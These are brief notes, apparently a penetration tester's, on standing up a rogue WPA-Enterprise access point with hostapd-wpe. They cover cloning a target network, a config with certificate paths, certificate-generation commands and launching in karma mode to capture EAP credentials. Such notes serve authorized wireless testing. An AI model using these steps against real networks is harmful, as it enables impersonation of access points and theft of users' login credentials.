https://github.com/OpenSecurityResearch/hostapd-wpe
get vendor of to clone access point
dont use the same bssid and channel -> otherwise you create conflicts and probably DOS
/etc/hostapd-wpe/hostapd-wpe.conf
interface=<interface>
...
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/certs/ca.pem
server_cert=/etc/hostapd-wpe/certs/server.pem
private_key=/etc/hostapd-wpe/certs/server.key
private_key_passwd=<password>
dh_file=/etc/hostapd-wpe/certs/dh
ssid=hostapd-wpe
channel=1
...
bssid=<bssid>
hostapd-wpe -c hostapd-wpe.conf
/etc/hostapd-wpe/certs
make destroycerts
./bootstrap
vim ca.cnf
make ca
make client
make server
hostapd-wpe -k <config>